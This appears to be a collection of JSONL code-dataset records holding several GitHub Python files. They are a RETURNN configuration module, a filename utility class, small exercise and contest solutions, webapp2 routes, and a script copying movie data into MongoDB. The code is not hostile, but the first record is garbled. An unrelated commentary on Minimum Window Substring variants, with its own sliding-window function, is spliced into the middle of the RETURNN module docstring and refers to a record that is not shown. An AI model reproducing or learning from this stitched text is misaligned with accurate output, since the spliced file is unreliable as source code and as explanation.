+{"seq_id":"3009654085","text":"\"\"\"\nProvides :class:`Config` and some related 
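Of the four variants in the Minimum Window Substring record above, minWindow4 is the canonical O(N+M) sliding window: counters for needed characters are allowed to go negative for surplus occurrences, so count == 0 certifies a valid window before the left edge contracts. A compact restatement with the record's own test strings:

import collections

def min_window(s: str, t: str) -> str:
    need = collections.Counter(t)
    missing = len(t)            # characters still required in the window
    best, left = "", 0
    for right, ch in enumerate(s):
        if need[ch] > 0:        # a genuinely needed character
            missing -= 1
        need[ch] -= 1           # surplus/irrelevant characters go negative
        while missing == 0:     # window [left, right] covers t: try to shrink
            if not best or right - left + 1 < len(best):
                best = s[left:right + 1]
            need[s[left]] += 1
            if need[s[left]] > 0:   # just dropped a needed character
                missing += 1
            left += 1
    return best

assert min_window("cabefgecdaecf", "caec") == "cdaec"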
helpers.\n\"\"\"\n\nfrom __future__ import annotations\n\n__author__ = \"Patrick Doetsch\"\n__credits__ = [\"Patrick Doetsch\", \"Paul Voigtlaender\"]\n\nfrom typing import Optional\nimport contextlib\nimport sys\nimport typing\nimport os\nimport types as _types\n\n\nclass Config:\n \"\"\"\n Reads in some config file, and provides access to the key/value items.\n We support some simple text-line-based config, JSON, and Python format.\n \"\"\"\n\n def __init__(self, items=None):\n \"\"\"\n :param dict[str]|None items: optional initial typed_dict\n \"\"\"\n self.dict = {} # type: typing.Dict[str, typing.List[str]]\n self.typed_dict = {} # :type: typing.Dict[str] # could be loaded via JSON or so\n self.network_topology_json = None # type: typing.Optional[str]\n self.files = []\n if items is not None:\n self.typed_dict.update(items)\n\n def __getstate__(self):\n import io\n from pickle import PicklingError\n from returnn.util.task_system import Pickler\n\n class _CustomPickler(Pickler):\n dispatch = Pickler.dispatch.copy()\n\n def save_global(self, obj, name=None):\n \"\"\"save global\"\"\"\n module_name = getattr(obj, \"__module__\", None)\n if module_name == _PyModuleName:\n raise PicklingError(\"Can not pickle %r from RETURNN config\" % obj)\n super().save_global(obj, name=name)\n\n # noinspection PyMethodParameters\n def intellisave_dict(self_, obj):\n \"\"\"save dict\"\"\"\n if obj is self.typed_dict:\n # Do not use the intelligent logic for our own dict.\n # We explicitly want to pickle it as-is.\n assert id(obj) not in self_.memo\n super().save_dict(obj) # noqa\n return\n super().intellisave_dict(obj)\n\n dispatch[dict] = intellisave_dict\n\n buffer = io.BytesIO()\n pickler = _CustomPickler(buffer)\n memo_idx = len(pickler.memo)\n pickler.memo[id(self)] = memo_idx, self\n pickler.dump(self.typed_dict)\n\n return {\n \"_pid\": os.getpid(),\n \"_self_memo_idx\": memo_idx,\n \"_typed_dict_pickled\": buffer.getvalue(),\n \"_is_global\": self is get_global_config(raise_exception=False),\n }\n\n def __setstate__(self, state):\n import io\n\n # Use pure-Python unpickling to be able to extend the memo.\n # noinspection PyUnresolvedReferences,PyProtectedMember\n from pickle import _Unpickler\n\n self.__init__()\n\n buffer = io.BytesIO(state[\"_typed_dict_pickled\"])\n unpickler = _Unpickler(buffer)\n unpickler.memo[state[\"_self_memo_idx\"]] = self\n self.typed_dict = unpickler.load()\n\n if state[\"_is_global\"] and os.getpid() != state[\"_pid\"]:\n set_global_config(self)\n _global_config_as_py_module_proxy_setup()\n\n def load_file(self, f):\n \"\"\"\n Reads the configuration parameters from a file and adds them to the inner set of parameters.\n\n :param string|io.TextIOBase|io.StringIO f:\n \"\"\"\n if isinstance(f, str):\n assert os.path.isfile(f), \"config file not found: %r\" % f\n self.files.append(f)\n filename = f\n dirname = os.path.dirname(filename) or \".\"\n content = open(filename).read()\n else:\n # assume stream-like\n filename = \"\"\n dirname = None\n content = f.read()\n content = content.strip()\n if content.startswith(\"#!\") or filename.endswith(\".py\"): # assume Python\n if dirname and os.path.exists(f\"{dirname}/__init__.py\") and filename.endswith(\".py\"):\n # It looks like a Python module inside a Python package.\n # Import it as a module.\n import importlib\n\n basedir = os.path.abspath(dirname)\n while os.path.exists(f\"{basedir}/__init__.py\"):\n basedir = os.path.dirname(basedir)\n if basedir not in sys.path:\n sys.path.insert(0, basedir)\n modname = 
os.path.relpath(dirname, basedir).replace(\"/\", \".\") + \".\" + os.path.basename(filename)[:-3]\n mod = importlib.import_module(modname)\n self.update(vars(mod))\n\n else:\n # Directly execute the Python code.\n from returnn.util.basic import custom_exec\n\n # Operate inplace on ourselves.\n # Also, we want that it's available as the globals() dict, so that defined functions behave well\n # (they would lose the local context otherwise).\n user_ns = self.typed_dict\n # Always overwrite:\n user_ns.update({\"config\": self, \"__file__\": filename, \"__name__\": _PyModuleName})\n custom_exec(content, filename, user_ns, user_ns)\n _global_config_as_py_module_proxy_setup()\n return\n if content.startswith(\"{\"): # assume JSON\n from returnn.util.basic import load_json\n\n json_content = load_json(content=content)\n assert isinstance(json_content, dict)\n self.update(json_content)\n return\n # old line-based format\n for line in content.splitlines():\n if \"#\" in line: # Strip away comment.\n line = line[: line.index(\"#\")]\n line = line.strip()\n if not line:\n continue\n line = line.split(None, 1)\n assert len(line) == 2, \"unable to parse config line: %r\" % line\n self.add_line(key=line[0], value=line[1])\n\n @classmethod\n def get_config_file_type(cls, f):\n \"\"\"\n :param str f: file path\n :return: \"py\", \"js\" or \"txt\"\n :rtype: str\n \"\"\"\n with open(f, \"r\") as f:\n start = f.read(3)\n if start.startswith(\"#!\"):\n return \"py\"\n if start.startswith(\"{\"):\n return \"js\"\n return \"txt\"\n\n def parse_cmd_args(self, args):\n \"\"\"\n :param list[str]|tuple[str] args:\n \"\"\"\n from optparse import OptionParser\n\n parser = OptionParser()\n parser.add_option(\n \"-a\",\n \"--activation\",\n dest=\"activation\",\n help=\"[STRING/LIST] Activation functions: logistic, tanh, softsign, relu, identity, zero, one, maxout.\",\n )\n parser.add_option(\n \"-b\",\n \"--batch_size\",\n dest=\"batch_size\",\n help=\"[INTEGER/TUPLE] Maximal number of frames per batch (optional: shift of batching window).\",\n )\n parser.add_option(\n \"-c\",\n \"--chunking\",\n dest=\"chunking\",\n help=\"[INTEGER/TUPLE] Maximal number of frames per sequence (optional: shift of chunking window).\",\n )\n parser.add_option(\"-d\", \"--description\", dest=\"description\", help=\"[STRING] Description of experiment.\")\n parser.add_option(\"-e\", \"--epoch\", dest=\"epoch\", help=\"[INTEGER] Starting epoch.\")\n parser.add_option(\"-E\", \"--eval\", dest=\"eval\", help=\"[STRING] eval file path\")\n parser.add_option(\n \"-f\",\n \"--gate_factors\",\n dest=\"gate_factors\",\n help=\"[none/local/global] Enables pooled (local) or separate (global) coefficients on gates.\",\n )\n parser.add_option(\"-g\", \"--lreg\", dest=\"lreg\", help=\"[FLOAT] L1 or L2 regularization.\")\n parser.add_option(\n \"-i\",\n \"--save_interval\",\n dest=\"save_interval\",\n help=\"[INTEGER] Number of epochs until a new model will be saved.\",\n )\n parser.add_option(\"-j\", \"--dropout\", dest=\"dropout\", help=\"[FLOAT] Dropout probability (0 to disable).\")\n parser.add_option(\n \"-k\", \"--output_file\", dest=\"output_file\", help=\"[STRING] Path to target file for network output.\"\n )\n parser.add_option(\"-l\", \"--log\", dest=\"log\", help=\"[STRING] Log file path.\")\n parser.add_option(\"-L\", \"--load\", dest=\"load\", help=\"[STRING] load model file path.\")\n parser.add_option(\n \"-m\", \"--momentum\", dest=\"momentum\", help=\"[FLOAT] Momentum term in gradient descent optimization.\"\n )\n parser.add_option(\n 
\"-n\", \"--num_epochs\", dest=\"num_epochs\", help=\"[INTEGER] Number of epochs that should be trained.\"\n )\n parser.add_option(\"-o\", \"--order\", dest=\"order\", help=\"[default/sorted/random] Ordering of sequences.\")\n parser.add_option(\"-p\", \"--loss\", dest=\"loss\", help=\"[loglik/sse/ctc] Objective function to be optimized.\")\n parser.add_option(\n \"-q\",\n \"--cache\",\n dest=\"cache\",\n help=\"[INTEGER] Cache size in bytes (supports notation for kilo (K), mega (M) and gigabyte (G)).\",\n )\n parser.add_option(\n \"-r\",\n \"--learning_rate\",\n dest=\"learning_rate\",\n help=\"[FLOAT] Learning rate in gradient descent optimization.\",\n )\n parser.add_option(\n \"-s\", \"--hidden_sizes\", dest=\"hidden_sizes\", help=\"[INTEGER/LIST] Number of units in hidden layers.\"\n )\n parser.add_option(\n \"-t\",\n \"--truncate\",\n dest=\"truncate\",\n help=\"[INTEGER] Truncates sequence in BPTT routine after specified number of timesteps (-1 to disable).\",\n )\n parser.add_option(\n \"-u\",\n \"--device\",\n dest=\"device\",\n help=\"[STRING/LIST] CPU and GPU devices that should be used (example: gpu0,cpu[1-6] or gpu,cpu*).\",\n )\n parser.add_option(\"-v\", \"--verbose\", dest=\"log_verbosity\", help=\"[INTEGER] Verbosity level from 0 - 5.\")\n parser.add_option(\"-w\", \"--window\", dest=\"window\", help=\"[INTEGER] Width of sliding window over sequence.\")\n parser.add_option(\"-x\", \"--task\", dest=\"task\", help=\"[train/forward/analyze] Task of the current program call.\")\n parser.add_option(\n \"-y\", \"--hidden_type\", dest=\"hidden_type\", help=\"[VALUE/LIST] Hidden layer types: forward, recurrent, lstm.\"\n )\n parser.add_option(\n \"-z\", \"--max_sequences\", dest=\"max_seqs\", help=\"[INTEGER] Maximal number of sequences per batch.\"\n )\n parser.add_option(\"--config\", dest=\"load_config\", help=\"[STRING] load config\")\n (options, args) = parser.parse_args(list(args))\n options = vars(options)\n for opt in options.keys():\n if options[opt] is not None:\n if opt == \"load_config\":\n self.load_file(options[opt])\n else:\n self.add_line(opt, options[opt])\n assert len(args) % 2 == 0, \"expect (++key, value) config tuples in remaining args: %r\" % args\n for i in range(0, len(args), 2):\n key, value = args[i : i + 2]\n assert key[0:2] == \"++\", \"expect key prefixed with '++' in (%r, %r)\" % (key, value)\n if value[:2] == \"+-\":\n value = value[1:] # otherwise we never could specify things like \"++threshold -0.1\"\n self.add_line(key=key[2:], value=value)\n\n def add_line(self, key, value):\n \"\"\"\n Adds one specific configuration (key,value) pair to the inner set of parameters\n :type key: str\n :type value: str\n \"\"\"\n if key in self.typed_dict:\n # This is a special case. We overwrite a config value which was typed before.\n # E.g. this could have been loaded via a Python config file.\n # We want to keep the entry in self.typed_dict because there might be functions/lambdas inside\n # the config which require the global variable to be available.\n # See :func:`test_rnn_init_config_py_global_var`.\n value_type = type(self.typed_dict[key])\n if value_type == str:\n pass # keep as-is\n else:\n try:\n value = eval(value)\n except SyntaxError:\n from returnn.log import log\n\n print(\n \"WARNING: can't evaluate config param %r to previous type: %s. 
Keeping as string.\"\n % (value, value_type),\n file=log.v1,\n )\n self.typed_dict[key] = value\n return\n if value.find(\",\") > 0:\n value = value.split(\",\")\n else:\n value = [value]\n if key == \"include\":\n for f in value:\n self.load_file(f)\n else:\n self.dict[key] = value\n\n def has(self, key):\n \"\"\"\n Returns whether the given key is present in the inner set of parameters\n :type key: string\n :rtype: boolean\n :returns True if and only if the given key is in the inner set of parameters\n \"\"\"\n if key in self.typed_dict:\n return True\n return key in self.dict\n\n def is_typed(self, key):\n \"\"\"\n :type key: string\n :rtype: boolean\n :returns True if and only if the value of the given key has a specified data type\n \"\"\"\n return key in self.typed_dict\n\n def is_true(self, key, default=False):\n \"\"\"\n :param str key:\n :param bool default:\n :return: bool(value) if it is set or default\n :rtype: bool\n \"\"\"\n if self.is_typed(key):\n return bool(self.typed_dict[key])\n return self.bool(key, default=default)\n\n def is_of_type(self, key, types):\n \"\"\"\n :param str key:\n :param type|tuple[type] types: for isinstance() check\n :return: whether is_typed(key) is True and isinstance(value, types) is True\n :rtype: bool\n \"\"\"\n if key in self.typed_dict:\n return isinstance(self.typed_dict[key], types)\n return False\n\n def get_of_type(self, key, types, default=None):\n \"\"\"\n :param str key:\n :param type|list[type]|T types: for isinstance() check\n :param T|None default:\n :return: if is_of_type(key, types) is True, returns the value, otherwise default\n :rtype: T\n \"\"\"\n if self.is_of_type(key, types):\n return self.typed_dict[key]\n return default\n\n def set(self, key, value):\n \"\"\"\n :type key: str\n :type value: list[str] | str | int | float | bool | dict | None\n \"\"\"\n self.typed_dict[key] = value\n\n def update(self, dikt):\n \"\"\"\n :type dikt: dict\n \"\"\"\n for key, value in dikt.items():\n self.set(key, value)\n\n def _hack_value_reading_debug(self):\n orig_value_func = self.value\n\n def wrapped_value_func(*args, **kwargs):\n \"\"\"\n Wrapped func.\n \"\"\"\n res = orig_value_func(*args, **kwargs)\n print(\n \"Config.value(%s) -> %r\"\n % (\", \".join(list(map(repr, args)) + [\"%s=%r\" % (k, v) for (k, v) in kwargs.items()]), res)\n )\n return res\n\n setattr(self, \"value\", wrapped_value_func)\n\n def value(self, key, default, index=None, list_join_str=\",\"):\n \"\"\"\n :type key: str\n :type default: T\n :type index: int | None\n :param str list_join_str:\n :rtype: str | T\n \"\"\"\n if key in self.typed_dict:\n ls = self.typed_dict[key]\n if index is None:\n if isinstance(ls, (list, tuple)):\n return list_join_str.join([str(v) for v in ls])\n elif ls is None:\n return default\n else:\n return str(ls)\n else:\n return str(ls[index])\n if key in self.dict:\n ls = self.dict[key]\n if index is None:\n return list_join_str.join(ls)\n else:\n return ls[index]\n return default\n\n def typed_value(self, key, default=None, index=None):\n \"\"\"\n :type key: str\n :type default: T\n :type index: int | None\n :rtype: T | typing.Any\n \"\"\"\n value = self.typed_dict.get(key, default)\n if index is not None:\n assert isinstance(index, int)\n if isinstance(value, (list, tuple)):\n value = value[index]\n else:\n assert index == 0\n return value\n\n def opt_typed_value(self, key, default=None):\n \"\"\"\n :param str key:\n :param T|None default:\n :rtype: T|object|str|None\n \"\"\"\n if key in self.typed_dict:\n return self.typed_dict[key]\n 
return self.value(key, default)\n\n def int(self, key, default, index=0):\n \"\"\"\n Parses the value of the given key as integer, returning default if not existent\n :type key: str\n :type default: T\n :type index: int\n :rtype: int | T\n \"\"\"\n if key in self.typed_dict:\n value = self.typed_value(key, default=default, index=index)\n if value is not None:\n assert isinstance(value, int)\n return value\n if key in self.dict:\n return int(self.value(key, default, index))\n return default\n\n def bool(self, key, default, index=0):\n \"\"\"\n Parses the value of the given key as boolean, returning default if not existent\n :type key: str\n :type default: T\n :type index: bool\n :rtype: bool | T\n \"\"\"\n if key in self.typed_dict:\n value = self.typed_value(key, default=default, index=index)\n if isinstance(value, int):\n value = bool(value)\n if value is not None:\n assert isinstance(value, bool)\n return value\n if key not in self.dict:\n return default\n v = str(self.value(key, None, index))\n if not v:\n return default\n from returnn.util.basic import to_bool\n\n return to_bool(v)\n\n def bool_or_other(self, key, default, index=0):\n \"\"\"\n :param str key:\n :param T default:\n :param int index:\n :return: if we have typed value, just as-is. otherwise try to convert to bool. or default if not there.\n :rtype: bool|T|object\n \"\"\"\n if key in self.typed_dict:\n return self.typed_value(key, default=default, index=index)\n if key not in self.dict:\n return default\n v = str(self.value(key, None, index))\n if not v:\n return default\n from returnn.util.basic import to_bool\n\n try:\n return to_bool(v)\n except ValueError:\n return v\n\n def float(self, key, default, index=0):\n \"\"\"\n Parses the value of the given key as float, returning default if not existent\n :type key: str\n :type default: T\n :type index: int\n :rtype: float | T\n \"\"\"\n if key in self.typed_dict:\n value = self.typed_value(key, default=default, index=index)\n else:\n value = self.value(key, default, index)\n if value is not None:\n if isinstance(value, str):\n # Special case for float as str. 
We automatically cast this case.\n # This is also to handle special values such as \"inf\".\n value = float(value)\n assert isinstance(value, (int, float))\n return value\n\n def list(self, key, default=None):\n \"\"\"\n :type key: str\n :type default: T\n :rtype: list[str] | T\n \"\"\"\n if default is None:\n default = []\n if key in self.typed_dict:\n value = self.typed_value(key, default=default)\n if value is None:\n return default\n if not isinstance(value, (tuple, list)):\n value = [value]\n return list(value)\n if key not in self.dict:\n return default\n return self.dict[key]\n\n def int_list(self, key, default=None):\n \"\"\"\n :type key: str\n :type default: T\n :rtype: list[int] | T\n \"\"\"\n if default is None:\n default = []\n if key in self.typed_dict:\n value = self.typed_value(key, default=default)\n if value is None:\n return default\n if not isinstance(value, (tuple, list)):\n value = [value]\n for x in value:\n assert isinstance(x, int)\n return list(value)\n return [int(x) for x in self.list(key, default)]\n\n def float_list(self, key, default=None):\n \"\"\"\n :type key: str\n :type default: T\n :rtype: list[float] | T\n \"\"\"\n if default is None:\n default = []\n if key in self.typed_dict:\n value = self.typed_value(key, default=default)\n if value is None:\n return default\n if not isinstance(value, (tuple, list)):\n value = [value]\n for x in value:\n assert isinstance(x, (float, int))\n return list(value)\n return [float(x) for x in self.list(key, default)]\n\n def int_pair(self, key, default=None):\n \"\"\"\n :param str key:\n :param (int,int)|None default:\n :rtype: (int,int)\n \"\"\"\n if default is None:\n default = (0, 0)\n if not self.has(key):\n return default\n if key in self.typed_dict:\n value = self.typed_value(key, default=default)\n if not isinstance(value, (tuple, list)):\n value = (value, value)\n assert len(value) == 2\n for x in value:\n assert isinstance(x, int)\n return tuple(value)\n value = self.value(key, \"\")\n if \":\" in value:\n return int(value.split(\":\")[0]), int(value.split(\":\")[1])\n else:\n return int(value), int(value)\n\n\n_global_config = None # type: typing.Optional[Config]\n\n\n@contextlib.contextmanager\ndef global_config_ctx(config: Config):\n \"\"\"\n sets the config as global config in this context,\n and recovers the original global config afterwards\n \"\"\"\n global _global_config\n prev_global_config = _global_config\n try:\n set_global_config(config)\n yield\n finally:\n _global_config = prev_global_config\n\n\ndef set_global_config(config):\n \"\"\"\n Will define the global config, returned by :func:`get_global_config`\n\n :param Config config:\n \"\"\"\n _get_or_set_config_via_tf_default_graph(config)\n global _global_config\n _global_config = config\n\n\ndef get_global_config(raise_exception=True, auto_create=False):\n \"\"\"\n :param bool raise_exception: if no global config is found, raise an exception, otherwise return None\n :param bool auto_create: if no global config is found, it creates one and returns it\n :rtype: Config|None\n \"\"\"\n config = _get_or_set_config_via_tf_default_graph()\n if config:\n return config\n if _global_config:\n return _global_config\n # We are the main process.\n import sys\n\n main_mod = sys.modules[\"__main__\"] # should be rnn.py\n if hasattr(main_mod, \"config\") and isinstance(main_mod.config, Config):\n return main_mod.config\n # Maybe __main__ is not rnn.py, or config not yet loaded.\n # Anyway, try directly. (E.g. 
for SprintInterface.)\n import returnn.__main__ as rnn\n\n if isinstance(rnn.config, Config):\n return rnn.config\n if auto_create:\n config = Config()\n set_global_config(config)\n return config\n if raise_exception:\n raise Exception(\"No global config found.\")\n return None\n\n\ndef _get_or_set_config_via_tf_default_graph(config=None):\n \"\"\"\n This is done in a safe way, and might just be a no-op.\n When TF is not imported yet, it will just return.\n\n :param Config|None config: if set, will set it\n :rtype: Config|None\n \"\"\"\n if \"tensorflow\" not in sys.modules:\n return None\n from returnn.tf.compat import v1 as tf_v1\n\n graph = tf_v1.get_default_graph()\n # We could use collection refs, but this could cause other problems,\n # and is more complicated than what we need.\n # We just use a custom own attrib.\n attrib_name = \"_RETURNN_config_in_graph\"\n if config:\n setattr(graph, attrib_name, config)\n return getattr(graph, attrib_name, None)\n\n\ndef network_json_from_config(config):\n \"\"\"\n :param Config config:\n :rtype: dict[str]\n \"\"\"\n if config.has(\"network\") and config.is_typed(\"network\"):\n json_content = config.typed_value(\"network\")\n assert isinstance(json_content, dict)\n assert json_content\n return json_content\n else:\n raise ValueError(\"Network is not defined in config. Define `network`.\")\n\n\ndef tf_should_use_gpu(config):\n \"\"\"\n :param Config config:\n :rtype: bool\n \"\"\"\n cfg_dev = config.value(\"device\", None)\n # Short path.\n if cfg_dev == \"gpu\":\n return True\n if cfg_dev == \"cpu\":\n return False\n if not cfg_dev:\n # Better default: Use GPU if available.\n from returnn.log import log\n from returnn.tf.util.basic import is_gpu_available\n\n if is_gpu_available():\n print(\"Device not set explicitly, and we found a GPU, which we will use.\", file=log.v2)\n config.set(\"device\", \"gpu\")\n return True\n else:\n print(\"Device not set explicitly, and no GPU found.\", file=log.v2)\n config.set(\"device\", \"cpu\")\n return False\n else:\n raise ValueError(\"Currently unsupported TF device %r specified\" % (cfg_dev,))\n\n\n_PyModuleName = \"__returnn_config__\"\n\n\ndef _global_config_as_py_module_proxy_setup():\n if _PyModuleName in sys.modules:\n return\n sys.modules[_PyModuleName] = _GlobalConfigAsPyModuleProxy(_PyModuleName)\n\n\nclass _GlobalConfigAsPyModuleProxy(_types.ModuleType):\n \"\"\"\n Takes :func:`get_global_config`, and makes its ``typed_dict`` available as module attributes.\n \"\"\"\n\n @staticmethod\n def _get_config() -> Optional[Config]:\n \"\"\"\n :return: config or None if not available anymore\n \"\"\"\n return get_global_config(raise_exception=False)\n\n def __getattribute__(self, item):\n # Implement also __getattribute__ such that early access to just self.__dict__ (e.g. 
via vars(self)) also works.\n if item == \"__dict__\":\n cfg: Optional[Config] = self._get_config()\n if not cfg:\n return {}\n return cfg\n return super().__getattribute__(item)\n\n def __getattr__(self, item):\n cfg: Optional[Config] = self._get_config()\n if not cfg:\n raise AttributeError(\"config %s not loaded anymore\" % self.__name__)\n if item not in cfg.typed_dict:\n raise AttributeError(\"config %s has no attribute %r\" % (self.__name__, item))\n return cfg.typed_dict[item]\n\n def __dir__(self):\n cfg: Optional[Config] = self._get_config()\n if not cfg:\n return []\n return sorted(cfg.typed_dict.keys())\n\n def __setattr__(self, key, value):\n if key in [\"__file__\"]:\n super().__setattr__(key, value)\n return\n cfg: Optional[Config] = self._get_config()\n if cfg:\n cfg.typed_dict[key] = value\n","repo_name":"rwth-i6/returnn","sub_path":"returnn/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":27766,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"53"} +{"seq_id":"7690816299","text":"import os\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass Filenames:\n\n @classmethod\n def _breakdown(cls, filepath: str, directory: str = \"\") -> list[str]:\n \"\"\"\n Breaks down a file path into its directory, filename, and extension components.\n\n Args:\n filepath (str): The file path to break down.\n directory (str): Optional. The directory path. If not provided, the directory of the file path will be used.\n\n Returns:\n list[str]: A list containing the directory, filename, and extension components.\n \"\"\"\n directory = directory if directory else os.path.dirname(filepath)\n filename, file_ext = os.path.splitext(os.path.basename(filepath))\n file_ext = file_ext if file_ext else \"\"\n return [directory, filename, file_ext]\n\n @classmethod\n def append(cls, filepath: str, append: str, directory: str = \"\", delim: str = \"_\") -> str:\n \"\"\"\n Returns a filename with a string appended at the end of the filename.\n\n Args:\n filepath (str): The file path to append the string to.\n append (str): The string to append to the filename.\n directory (str): Optional. The directory path. If not provided, the directory of the file path will be used.\n delim (str): Optional. The delimiter to use between the original filename and the appended string.\n\n Returns:\n str: A filename with the specified string appended.\n \"\"\"\n directory, filename, file_ext = Filenames._breakdown(filepath, directory)\n new_filename = f\"{filename}{delim}{append}\"\n new_filepath = os.path.join(directory, new_filename + file_ext)\n return new_filepath\n\n @classmethod\n def prepend(cls, filepath: str, prepend: str, directory: str = \"\", delim: str = \"_\") -> str:\n \"\"\"\n Returns a filename with a string prepended at the beginning of the filename.\n\n Args:\n filepath (str): The file path to prepend the string to.\n prepend (str): The string to prepend to the filename.\n directory (str): Optional. The directory path. If not provided, the directory of the file path will be used.\n delim (str): Optional. 
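The Config class in the returnn/config.py record above keeps two stores: typed_dict for values loaded from Python/JSON configs (returned as-is) and dict for raw string pairs, with accessors like bool()/int()/float() coercing the string side. A minimal usage sketch (keys are made up):

from returnn.config import Config  # assuming RETURNN is installed

cfg = Config()
cfg.set("use_tensorflow", True)          # lands in typed_dict, returned as-is
cfg.add_line("learning_rate", "0.001")   # raw string, coerced on access

assert cfg.bool("use_tensorflow", default=False) is True
assert cfg.float("learning_rate", default=0.0) == 0.001
assert cfg.int("num_epochs", default=10) == 10  # missing key -> default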
The delimiter to use between the prepended string and the original filename.\n\n Returns:\n str: A filename with the specified string prepended.\n \"\"\"\n directory, filename, file_ext = Filenames._breakdown(filepath, directory)\n new_filename = f\"{prepend}{delim}{filename}\"\n new_filepath = os.path.join(directory, new_filename + file_ext)\n return new_filepath\n\n @classmethod\n def enumerate(cls, filepath: str, count: int, directory: str = \"\", delim: str = \"_\", digits: int = 3) -> str:\n \"\"\"\n Returns a filename with a specified numerical suffix.\n\n Args:\n filepath (str): The file path to add the numerical suffix to.\n count (int): The numerical suffix to append to the filename.\n directory (str): Optional. The directory path. If not provided, the directory of the file path will be used.\n delim (str): Optional. The delimiter to use between the original filename and the numerical suffix.\n digits (int): Optional. The number of digits to use for the numerical suffix. The default is 3.\n\n Returns:\n str: A filename with the specified numerical suffix.\n \"\"\"\n directory, filename, file_ext = Filenames._breakdown(filepath, directory)\n format_str = \"{:0\" + str(digits) + \"}\"\n formatted_num = format_str.format(count)\n new_filename = f\"{filename}{delim}{formatted_num}\"\n new_filepath = os.path.join(directory, new_filename + file_ext)\n return new_filepath\n\n @classmethod\n def unique(cls, filepath: str, directory: str = \"\", delim: str = \"_\", digits: int = 3) -> str:\n \"\"\"\n Returns a unique filename by appending a numerical suffix to the original filename.\n\n The numerical suffix starts at 0 and increments until a unique filename is found.\n\n Args:\n filepath (str): The original file path.\n directory (str): Optional. The directory path. If not provided, the directory of the file path will be used.\n delim (str): Optional. The delimiter to use between the original filename and the numerical suffix.\n digits (int): Optional. The number of digits to use for the numerical suffix. The default is 3.\n\n Returns:\n str: A unique filename.\n \"\"\"\n directory, filename, file_ext = Filenames._breakdown(filepath, directory)\n filepath = os.path.join(directory, filename + file_ext)\n\n current_suffix: int = 0\n new_filepath = Filenames.enumerate(filepath=filepath, count=current_suffix, directory=directory,\n delim=delim, digits=digits)\n\n # Loop until a unique filename is found\n while os.path.exists(new_filepath):\n current_suffix += 1\n new_filepath = Filenames.enumerate(filepath=filepath, count=current_suffix, directory=directory,\n delim=delim, digits=digits)\n return new_filepath\n","repo_name":"jsailsbery/basicore","sub_path":"basicore/files/filenames.py","file_name":"filenames.py","file_ext":"py","file_size_in_byte":5283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44182635372","text":"\"\"\"\r\nSeries14. Дано целое число K и набор ненулевых целых чисел; признак его\r\nзавершения — число 0. 
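The Filenames helpers in the record above all derive new paths the same way: split a path into (directory, stem, extension) via _breakdown, decorate the stem, and re-join. A short usage sketch (paths are illustrative; the import path is assumed from the record's sub_path):

from basicore.files.filenames import Filenames

# append/prepend decorate the stem, keeping directory and extension
assert Filenames.append("/tmp/report.csv", "v2") == "/tmp/report_v2.csv"
assert Filenames.prepend("/tmp/report.csv", "old") == "/tmp/old_report.csv"

# enumerate zero-pads a counter; unique() probes the filesystem for a free slot
assert Filenames.enumerate("/tmp/report.csv", 7) == "/tmp/report_007.csv"
path = Filenames.unique("/tmp/report.csv")  # e.g. /tmp/report_000.csv if unused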
Вывести количество чисел в наборе, меньших K.\r\n\"\"\"\r\nimport random\r\n\r\nresultList = list()\r\n\r\nK = int(input(\"Введите число - \"))\r\n\r\ncount = 0\r\n\r\nfor x in range(0,100):\r\n\tparam = random.randint(-10, 10)\r\n\tif param != 0:\r\n\t\tresultList.append(param)\r\n\t\tif param < K:\r\n\t\t\tcount += 1\r\n\r\n\telif param == 0:\r\n\t\tresultList.append(param)\r\n\t\tbreak\r\n\r\nprint(resultList)\r\nprint(\"=========================================\")\r\n\r\nprint(\"Количество чисел меньше\",K, \"-\", count)\r\n","repo_name":"666sempron999/Abramyan-tasks-","sub_path":"Series(40)/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73098248487","text":"# ---------- Import ----------\nimport sys\ninput = sys.stdin.readline\n\n# ---------- Main ----------\nN, M = map(int, input().split())\nwords = {}\n\nfor _ in range(N):\n word = input().rstrip()\n\n if len(word) < M: continue\n\n if not word in words:\n words[word] = 1\n else:\n words[word] += 1\n\nwords = sorted(words.items(),\\\n key = lambda k: (-k[1], -len(k[0]), k[0]))\n\nfor item, value in words:\n print(item)","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_20920.py","file_name":"acmicpc_20920.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28337106881","text":"\"\"\"\nUsing redirect route instead of simple routes since it supports strict_slash\nSimple route: http://webapp-improved.appspot.com/guide/routing.html#simple-routes\nRedirectRoute: http://webapp-improved.appspot.com/api/webapp2_extras/routes.html#webapp2_extras.routes.RedirectRoute\n\"\"\"\nfrom webapp2_extras.routes import RedirectRoute\nfrom bp_includes import handlers as handlers\nfrom myHandlers import *\n\nfrom uploadrest import *\nfrom upqueue import *\n\n\nsecure_scheme = 'https'\n\n_routes = [ \n RedirectRoute('/', UploadHandler),\n RedirectRoute('/uploadaward', PostAwardHandler),\n RedirectRoute('/upqueue', UpQueueHandler)\n ]\n\ndef get_routes():\n return _routes\n\ndef add_routes(app):\n if app.debug:\n secure_scheme = 'http'\n for r in _routes:\n app.router.add(r)\n","repo_name":"govtmirror/KS-2014","sub_path":"Upload_mod/ks/myRoutes.py","file_name":"myRoutes.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8563877253","text":"import pandas as pd\nimport json\nimport numpy as np\nimport pymongo\nfrom pymongo import MongoClient\nfrom scripts.tmdb_api import getInfoIMDB\n\nclient = MongoClient('127.0.0.1', 27017)\ndb = client.aoligei\nimdb_collection = db.imdb_movies\ntmdb_collection = db.tmdb_movies\nreviews = db.reviews\n\nimdb_cursor = imdb_collection.find({}, {'_id': 1})\n\ncount = 0\n\nfor p in imdb_cursor:\n \n if (count % 1000) == 0:\n print(count)\n count += 1\n\n try:\n info = getInfoIMDB(p['_id'])\n if info is not None:\n tmdb_collection.insert_one(json.loads(info[0]))\n reviews.insert_one(json.loads(info[1]))\n except:\n 